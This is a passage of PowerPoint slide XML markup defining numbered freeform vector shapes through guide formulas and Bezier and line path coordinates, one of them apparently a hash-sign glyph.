              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5774" y="3343"/>
                <a:ext cx="5" cy="2"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 4"/>
                  <a:gd name="T1" fmla="*/ 0 h 2"/>
                  <a:gd name="T2" fmla="*/ 3 w 4"/>
                  <a:gd name="T3" fmla="*/ 0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1"/>
                      <a:pt x="3" y="1"/>
                      <a:pt x="4" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="2"/>
                      <a:pt x="3" y="2"/>
                      <a:pt x="2"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233"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1951"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234"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2149"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235"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2299"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Freeform 236"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2446"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Freeform 237"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2643"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Freeform 238"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2792"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239"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2990" y="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240"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3140"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241"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3288"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Freeform 242"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="343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243"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3632"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Freeform 244"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="382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245"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4228"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Freeform 246"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4425"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247"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4575"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Freeform 248"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4723"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249"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4920"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8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4"/>
                      <a:pt x="0" y="55"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="32"/>
                      <a:pt x="0" y="32"/>
                      <a:pt x="0" y="32"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="31"/>
                      <a:pt x="11" y="29"/>
                      <a:pt x="16" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="24"/>
                      <a:pt x="27" y="21"/>
                      <a:pt x="32" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="16"/>
                      <a:pt x="43" y="13"/>
                      <a:pt x="48"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Freeform 250"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5070"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251"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="521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Freeform 252"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5414"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Freeform 253"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="560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Freeform 254"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5806"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255"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5943" y="13"/>
                <a:ext cx="188" cy="219"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 188 w 188"/>
                  <a:gd name="T1" fmla="*/ 68 h 219"/>
                  <a:gd name="T2" fmla="*/ 185 w 188"/>
                  <a:gd name="T3" fmla="*/ 85 h 219"/>
                  <a:gd name="T4" fmla="*/ 141 w 188"/>
                  <a:gd name="T5" fmla="*/ 85 h 219"/>
                  <a:gd name="T6" fmla="*/ 130 w 188"/>
                  <a:gd name="T7" fmla="*/ 135 h 219"/>
                  <a:gd name="T8" fmla="*/ 177 w 188"/>
                  <a:gd name="T9" fmla="*/ 135 h 219"/>
                  <a:gd name="T10" fmla="*/ 173 w 188"/>
                  <a:gd name="T11" fmla="*/ 153 h 219"/>
                  <a:gd name="T12" fmla="*/ 126 w 188"/>
                  <a:gd name="T13" fmla="*/ 153 h 219"/>
                  <a:gd name="T14" fmla="*/ 112 w 188"/>
                  <a:gd name="T15" fmla="*/ 219 h 219"/>
                  <a:gd name="T16" fmla="*/ 91 w 188"/>
                  <a:gd name="T17" fmla="*/ 219 h 219"/>
                  <a:gd name="T18" fmla="*/ 106 w 188"/>
                  <a:gd name="T19" fmla="*/ 153 h 219"/>
                  <a:gd name="T20" fmla="*/ 64 w 188"/>
                  <a:gd name="T21" fmla="*/ 153 h 219"/>
                  <a:gd name="T22" fmla="*/ 49 w 188"/>
                  <a:gd name="T23" fmla="*/ 219 h 219"/>
                  <a:gd name="T24" fmla="*/ 29 w 188"/>
                  <a:gd name="T25" fmla="*/ 219 h 219"/>
                  <a:gd name="T26" fmla="*/ 43 w 188"/>
                  <a:gd name="T27" fmla="*/ 153 h 219"/>
                  <a:gd name="T28" fmla="*/ 0 w 188"/>
                  <a:gd name="T29" fmla="*/ 153 h 219"/>
                  <a:gd name="T30" fmla="*/ 3 w 188"/>
                  <a:gd name="T31" fmla="*/ 135 h 219"/>
                  <a:gd name="T32" fmla="*/ 47 w 188"/>
                  <a:gd name="T33" fmla="*/ 135 h 219"/>
                  <a:gd name="T34" fmla="*/ 57 w 188"/>
                  <a:gd name="T35" fmla="*/ 85 h 219"/>
                  <a:gd name="T36" fmla="*/ 10 w 188"/>
                  <a:gd name="T37" fmla="*/ 85 h 219"/>
                  <a:gd name="T38" fmla="*/ 14 w 188"/>
                  <a:gd name="T39" fmla="*/ 68 h 219"/>
                  <a:gd name="T40" fmla="*/ 60 w 188"/>
                  <a:gd name="T41" fmla="*/ 68 h 219"/>
                  <a:gd name="T42" fmla="*/ 74 w 188"/>
                  <a:gd name="T43" fmla="*/ 0 h 219"/>
                  <a:gd name="T44" fmla="*/ 96 w 188"/>
                  <a:gd name="T45" fmla="*/ 0 h 219"/>
                  <a:gd name="T46" fmla="*/ 81 w 188"/>
                  <a:gd name="T47" fmla="*/ 68 h 219"/>
                  <a:gd name="T48" fmla="*/ 124 w 188"/>
                  <a:gd name="T49" fmla="*/ 68 h 219"/>
                  <a:gd name="T50" fmla="*/ 137 w 188"/>
                  <a:gd name="T51" fmla="*/ 0 h 219"/>
                  <a:gd name="T52" fmla="*/ 158 w 188"/>
                  <a:gd name="T53" fmla="*/ 0 h 219"/>
                  <a:gd name="T54" fmla="*/ 145 w 188"/>
                  <a:gd name="T55" fmla="*/ 68 h 219"/>
                  <a:gd name="T56" fmla="*/ 188 w 188"/>
                  <a:gd name="T57" fmla="*/ 68 h 219"/>
                  <a:gd name="T58" fmla="*/ 120 w 188"/>
                  <a:gd name="T59" fmla="*/ 85 h 219"/>
                  <a:gd name="T60" fmla="*/ 78 w 188"/>
                  <a:gd name="T61" fmla="*/ 85 h 219"/>
                  <a:gd name="T62" fmla="*/ 67 w 188"/>
                  <a:gd name="T63" fmla="*/ 135 h 219"/>
                  <a:gd name="T64" fmla="*/ 109 w 188"/>
                  <a:gd name="T65" fmla="*/ 135 h 219"/>
                  <a:gd name="T66" fmla="*/ 120 w 188"/>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9">
                    <a:moveTo>
                      <a:pt x="188" y="68"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="185" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="68"/>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Freeform 256"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6159"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257"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6357"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Freeform 258"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6506" y="9"/>
                <a:ext cx="154" cy="247"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 127 w 127"/>
                  <a:gd name="T1" fmla="*/ 101 h 203"/>
                  <a:gd name="T2" fmla="*/ 123 w 127"/>
                  <a:gd name="T3" fmla="*/ 145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259"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6701"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Freeform 260"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6898"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261"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7045"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Freeform 262"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7244" y="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263"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7392"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Freeform 264"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7589"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265"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7739"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Freeform 266"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3986" y="0"/>
                <a:ext cx="219"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6 w 179"/>
                  <a:gd name="T85" fmla="*/ 42 h 209"/>
                  <a:gd name="T86" fmla="*/ 78 w 179"/>
                  <a:gd name="T87" fmla="*/ 44 h 209"/>
                  <a:gd name="T88" fmla="*/ 65 w 179"/>
                  <a:gd name="T89" fmla="*/ 35 h 209"/>
                  <a:gd name="T90" fmla="*/ 67 w 179"/>
                  <a:gd name="T91" fmla="*/ 48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09" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="198"/>
                      <a:pt x="90" y="198"/>
                      <a:pt x="80" y="199"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="199"/>
                      <a:pt x="72" y="199"/>
                      <a:pt x="68" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="203"/>
                      <a:pt x="64" y="204"/>
                      <a:pt x="63" y="205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="209"/>
                      <a:pt x="53" y="209"/>
                      <a:pt x="48" y="208"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="206"/>
                      <a:pt x="38" y="204"/>
                      <a:pt x="32" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="200"/>
                      <a:pt x="18" y="199"/>
                      <a:pt x="11" y="197"/>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9" y="160"/>
                      <a:pt x="12" y="160"/>
                      <a:pt x="14" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="158"/>
                      <a:pt x="22" y="155"/>
                      <a:pt x="23" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="153"/>
                      <a:pt x="23" y="160"/>
                      <a:pt x="17" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="163"/>
                      <a:pt x="12" y="163"/>
                      <a:pt x="9" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="163"/>
                      <a:pt x="9" y="162"/>
                      <a:pt x="9" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="162"/>
                      <a:pt x="3" y="164"/>
                      <a:pt x="4" y="168"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="169"/>
                      <a:pt x="5" y="171"/>
                      <a:pt x="6" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="176"/>
                      <a:pt x="8" y="180"/>
                      <a:pt x="6" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="185"/>
                      <a:pt x="5" y="186"/>
                      <a:pt x="4" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="190"/>
                      <a:pt x="4" y="192"/>
                      <a:pt x="6" y="193"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="193"/>
                      <a:pt x="11" y="194"/>
                      <a:pt x="13" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="196"/>
                      <a:pt x="35" y="199"/>
                      <a:pt x="45" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="203"/>
                      <a:pt x="52" y="204"/>
                      <a:pt x="55" y="204"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="202"/>
                      <a:pt x="66" y="198"/>
                      <a:pt x="64" y="190"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="186"/>
                      <a:pt x="62" y="182"/>
                      <a:pt x="60" y="179"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="170"/>
                      <a:pt x="49" y="161"/>
                      <a:pt x="42" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="150"/>
                      <a:pt x="37" y="147"/>
                      <a:pt x="35" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="143"/>
                      <a:pt x="29" y="143"/>
                      <a:pt x="27" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="145"/>
                      <a:pt x="25" y="145"/>
                      <a:pt x="25" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="140"/>
                      <a:pt x="24" y="137"/>
                      <a:pt x="25" y="134"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="133"/>
                      <a:pt x="26" y="131"/>
                      <a:pt x="27" y="130"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="125"/>
                      <a:pt x="32"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7"/>
                      <a:pt x="63" y="8"/>
                      <a:pt x="73" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="1"/>
                      <a:pt x="81" y="0"/>
                      <a:pt x="85" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="0"/>
                      <a:pt x="97" y="1"/>
                      <a:pt x="102" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="109" y="6"/>
                      <a:pt x="114" y="11"/>
                      <a:pt x="117" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="24"/>
                      <a:pt x="122" y="30"/>
                      <a:pt x="122" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="40"/>
                      <a:pt x="122" y="44"/>
                      <a:pt x="123" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="124" y="61"/>
                      <a:pt x="128" y="75"/>
                      <a:pt x="138" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="97"/>
                      <a:pt x="156" y="112"/>
                      <a:pt x="159" y="128"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="133"/>
                      <a:pt x="161" y="138"/>
                      <a:pt x="160" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159"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9"/>
                      <a:pt x="122" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="189"/>
                      <a:pt x="121" y="192"/>
                      <a:pt x="122" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="202"/>
                      <a:pt x="129" y="205"/>
                      <a:pt x="136" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="202"/>
                      <a:pt x="142" y="200"/>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5"/>
                      <a:pt x="160" y="154"/>
                      <a:pt x="161" y="153"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="71" y="69"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="71"/>
                      <a:pt x="74" y="73"/>
                      <a:pt x="77" y="74"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="74"/>
                      <a:pt x="85" y="73"/>
                      <a:pt x="88" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="70"/>
                      <a:pt x="94" y="68"/>
                      <a:pt x="97" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="98" y="66"/>
                      <a:pt x="100" y="66"/>
                      <a:pt x="101" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="66"/>
                      <a:pt x="102" y="66"/>
                      <a:pt x="102" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="67"/>
                      <a:pt x="102" y="68"/>
                      <a:pt x="101" y="68"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="69"/>
                      <a:pt x="100" y="69"/>
                      <a:pt x="99" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="94" y="72"/>
                      <a:pt x="90" y="75"/>
                      <a:pt x="86" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="79"/>
                      <a:pt x="83" y="80"/>
                      <a:pt x="81" y="81"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="82"/>
                      <a:pt x="75" y="82"/>
                      <a:pt x="73" y="80"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="77"/>
                      <a:pt x="69" y="74"/>
                      <a:pt x="67" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="71"/>
                      <a:pt x="66" y="70"/>
                      <a:pt x="65" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="70"/>
                      <a:pt x="65" y="71"/>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100"/>
                      <a:pt x="56" y="101"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="105"/>
                      <a:pt x="51" y="109"/>
                      <a:pt x="50" y="113"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="117"/>
                      <a:pt x="46" y="122"/>
                      <a:pt x="46" y="127"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="130"/>
                      <a:pt x="46" y="133"/>
                      <a:pt x="46" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="138"/>
                      <a:pt x="45" y="139"/>
                      <a:pt x="45" y="140"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="142"/>
                      <a:pt x="43" y="142"/>
                      <a:pt x="42" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="140"/>
                      <a:pt x="41" y="139"/>
                      <a:pt x="40" y="138"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="134"/>
                      <a:pt x="37" y="130"/>
                      <a:pt x="37" y="125"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="124"/>
                      <a:pt x="38" y="122"/>
                      <a:pt x="38" y="121"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="121"/>
                      <a:pt x="38" y="121"/>
                      <a:pt x="38" y="121"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="122"/>
                      <a:pt x="37" y="123"/>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70"/>
                      <a:pt x="69" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="175"/>
                      <a:pt x="67" y="177"/>
                      <a:pt x="64" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="178"/>
                      <a:pt x="63" y="178"/>
                      <a:pt x="62" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="180"/>
                      <a:pt x="64" y="182"/>
                      <a:pt x="66" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="186"/>
                      <a:pt x="69" y="189"/>
                      <a:pt x="69" y="192"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="194"/>
                      <a:pt x="70" y="196"/>
                      <a:pt x="70" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="197"/>
                      <a:pt x="70" y="197"/>
                      <a:pt x="70"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6" y="182"/>
                      <a:pt x="115" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="188"/>
                      <a:pt x="114" y="191"/>
                      <a:pt x="113" y="193"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="113" y="195"/>
                      <a:pt x="114" y="196"/>
                      <a:pt x="116" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="191"/>
                      <a:pt x="118" y="187"/>
                      <a:pt x="119" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="179"/>
                      <a:pt x="120" y="175"/>
                      <a:pt x="119" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="167"/>
                      <a:pt x="118" y="164"/>
                      <a:pt x="118" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="118" y="157"/>
                      <a:pt x="118" y="153"/>
                      <a:pt x="119" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="148"/>
                      <a:pt x="122" y="146"/>
                      <a:pt x="125" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="126" y="146"/>
                      <a:pt x="126" y="146"/>
                      <a:pt x="126" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="142"/>
                      <a:pt x="129" y="140"/>
                      <a:pt x="132" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="137" y="138"/>
                      <a:pt x="141" y="139"/>
                      <a:pt x="146" y="141"/>
                    </a:cubicBezTo>
